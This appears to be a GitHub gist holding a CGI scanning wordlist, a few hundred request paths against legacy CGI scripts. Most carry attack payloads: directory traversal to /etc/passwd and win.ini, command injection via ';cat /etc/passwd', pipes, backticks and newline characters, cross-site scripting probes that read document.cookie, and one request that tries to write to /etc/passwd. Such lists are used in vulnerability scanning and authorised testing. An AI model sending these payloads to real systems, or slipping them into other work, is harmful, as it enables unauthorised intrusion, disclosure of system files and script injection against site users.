Skip to content

Instantly share code, notes, and snippets.

@giper45

giper45/cgis.txt

Created July 22, 2024 16:14
Show Gist options
  • Save giper45/35c482a1c558e2646fdccc5cb0faea6b to your computer and use it in GitHub Desktop.
Save giper45/35c482a1c558e2646fdccc5cb0faea6b to your computer and use it in GitHub Desktop.
Download ZIP
CGI wordlist
Raw
cgis.txt
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/AT-admin.cgi
cgi-bin/AT-generate.cgi
cgi-bin/AnyBoard.cgi
cgi-bin/Backup/add-passwd.cgi
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/CSNews.cgi
cgi-bin/Count.cgi
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/FormMail.cgi?<script>alert(\
cgi-bin/Gozila.cgi
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/LWGate.cgi
cgi-bin/Pbcgi.exe
cgi-bin/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/add_ftp.cgi
cgi-bin/addbanner.cgi
cgi-bin/adduser.cgi
cgi-bin/admcgi/contents.htm
cgi-bin/admcgi/scripts/Fpadmcgi.exe
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse.cgi
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/anyboard.cgi
cgi-bin/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
cgi-bin/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
cgi-bin/architext_query.cgi
cgi-bin/astrocam.cgi
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/auction/auction.cgi?action=
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axis-cgi/buffer/command.cgi
cgi-bin/axs.cgi
cgi-bin/badmin.cgi
cgi-bin/bandwidth/index.cgi
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/bbs_forum.cgi
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/bnbform.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/c_download.cgi
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/calendar/index.cgi
cgi-bin/cartcart.cgi
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill/whereami.cgi
cgi-bin/cd-cgi/sscd_suncourier.pl
cgi-bin/cgforum.cgi
cgi-bin/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-bin/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-bin/cgi-sys/FormMail-clone.cgi
cgi-bin/cgi-sys/addalink.cgi
cgi-bin/cgi-sys/cgiecho
cgi-bin/cgi-sys/cgiemail
cgi-bin/cgi-sys/domainredirect.cgi
cgi-bin/cgi-sys/entropybanner.cgi
cgi-bin/cgi-sys/entropysearch.cgi
cgi-bin/cgi-sys/helpdesk.cgi
cgi-bin/cgi-sys/mchat.cgi
cgi-bin/cgi-sys/randhtml.cgi
cgi-bin/cgi-sys/realhelpdesk.cgi
cgi-bin/cgi-sys/realsignup.cgi
cgi-bin/cgi-sys/scgiwrap
cgi-bin/cgi-sys/signup.cgi
cgi-bin/cgi-win/cgitest.exe
cgi-bin/cgi/cgiproc?
cgi-bin/cgis/wwwboard/wwwboard.cgi
cgi-bin/classified.cgi
cgi-bin/classifieds.cgi
cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/compatible.cgi
cgi-bin/count.cgi
cgi-bin/cp/rac/nsManager.cgi
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csPassword.cgi
cgi-bin/csPassword.cgi?command=remove%20
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsblame.cgi?file=<script>alert('XSS')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('XSS')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dfire.cgi
cgi-bin/diagnose.cgi
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/download.cgi
cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=.%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/ez2000/ezadmin.cgi
cgi-bin/ez2000/ezboard.cgi
cgi-bin/ez2000/ezman.cgi
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/flexform.cgi
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom.cgi?file=<script>alert('XSS')</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
cgi-bin/formmail.cgi
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/gH.cgi
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/generate.cgi?content=../../../../../../../../../../etc
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/getdoc.cgi
cgi-bin/gm-authors.cgi
cgi-bin/gm-cplog.cgi
cgi-bin/gm.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/handler.cgi
cgi-bin/hitmatic/analyse.cgi
cgi-bin/hitview.cgi
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/hsx.cgi?show=../../../../../../../../../../../passwd%00
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/infosrch.cgi
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/lastlines.cgi?process
cgi-bin/lcgi/lcgitest.nlm
cgi-bin/lcgi/ndsobj.nlm
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
cgi-bin/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log-reader.cgi
cgi-bin/login.cgi
cgi-bin/logit.cgi
cgi-bin/lookwho.cgi
cgi-bin/lwgate.cgi
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/maillist.cgi
cgi-bin/mailnews.cgi
cgi-bin/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/manage/cgi/cgiproc
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/ministats/admin.cgi
cgi-bin/mmstdod.cgi
cgi-bin/mods/apage/apage.cgi?f=file.htm.|id|
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netpad.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/nlog-smb.cgi
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-publish.cgi
cgi-bin/nph-test-cgi
cgi-bin/officescan/cgi/cgiChkMasterPwd.exe
cgi-bin/officescan/cgi/jdkRqNotify.exe
cgi-bin/page.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse_xml.cgi
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3C
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/perl/samples/lancgi.pl
cgi-bin/perl/samples/volscgi.pl
cgi-bin/perlshop.cgi
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/phf.cgi?QALIA
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/photo/manage.cgi
cgi-bin/photo/protected/manage.cgi
cgi-bin/photodata/manage.cgi
cgi-bin/php-cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/postcards.cgi
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../passwd
cgi-bin/ppdscgi.exe
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/profile.cgi
cgi-bin/pub/english.cgi?op=rmail
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikmail/nph-emumail.cgi?type=../%00
cgi-bin/quikstore.cgi
cgi-bin/quizme.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ratlog.cgi
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/responder.cgi
cgi-bin/reviews/newpro.cgi
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/scripts/fpadmcgi.exe
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
cgi-bin/sendform.cgi
cgi-bin/servers/link.cgi
cgi-bin/setpasswd.cgi
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop/member_html.cgi?file=;cat%20/etc/passwd|
cgi-bin/shop/member_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
cgi-bin/shop/normal_html.cgi?file=../../../../../../etc/issue%00
cgi-bin/shop/normal_html.cgi?file=;cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showcheckins.cgi?person=<script>alert('XSS')</script>
cgi-bin/showuser.cgi
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/site_searcher.cgi
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
cgi-bin/store.cgi?
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?cart_id=<script>alert('XSS')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/survey.cgi
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
cgi-bin/technote/print.cgi
cgi-bin/test-cgi.bat
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-cgi?/*
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/testcgi.exe
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/title.cgi
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/troops.cgi
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
cgi-bin/ultraboard.cgi
cgi-bin/upload.cgi
cgi-bin/upload.cgi+
cgi-bin/urlcount.cgi?%3CIMG%20
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
cgi-bin/users/scripts/submit.cgi
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/webbbs.cgi
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webif.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmap.cgi
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/wrap.cgi
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard/wwwboard.cgi
cgi-bin/zml.cgi?file=../../../../../../../../../../etc
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment